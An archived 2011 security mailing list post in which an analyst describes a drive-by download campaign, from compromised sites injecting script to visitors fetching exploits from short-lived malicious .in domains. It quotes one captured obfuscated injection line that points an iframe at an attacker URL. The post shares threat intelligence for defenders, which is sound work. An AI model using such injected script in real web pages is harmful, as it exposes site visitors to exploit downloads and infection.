Security Basics mailing list archives

RE: There is a strange get request header in all web pages of my site? I'm worry about Trojan attack!

From: "Kropotov, Vladimir B." <vbkropotov () tnk-bp com>
Date: Fri, 9 Sep 2011 12:36:01 +0400

Hello list.
Because this problem seemed to be global, my 2 cents..

This activity was found using IBM ISS about 1 month ago.
Attack scheme:
A) Participants
Site with malware (1)
Hacked Site (2)
User host with browser (3)

b) Actions (source, target, action)
b1. (1) - > (2) -> script injection
b2. (2) - > (3) -> script execution
b3. (3) -> (1) -> exploit download
b4. (3) -> (3) - > exploit execution with rights of current user

c) what we know about:
(1) just registered to faked person
(1) has lifetime about 1 week
(1) moves from old to new domains
(1) some domains appear in blacklist, but after their lifetime
(1) domain samples inaptly.in, unaropanda.in, sonorophone.in, etc.,
known domains ~100
(1) at the time of first appearance, the majority of domains was hosted
in Romania, now in USA
(2) Usual sites, which are possibly use the same management system, but
may be not...
(3) Knows nothing about possible malicious content on (2)
(1)(2) in the beginning of aug we found some signatures, where exploit
was located on the hacked site, but during the time scheme moved to b)
b1. Nothing, we not control internet
b2. In current scheme attackers employs IDS evasion technique. Here's
the sample we catch: script
document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd
2/08.p'+'hp';
b3. It looks like loaded exploit depends on user environment. Script
(the sample we catch) checks OS (Win, FreeBSD,Mac, iPhone, Linux,
etc...), browser and browser version (IE, Gecko, Opera, Safari, Chrome,
etc.), browser plugins, ActiveX enabled or not, ShockwaveFlash,
wmplayer, Adobe Reader, etc....

If someone would like to continue - it will be useful for all!

regards
Vladimir B. Kropotov
Information Security Department

TNK-BP.com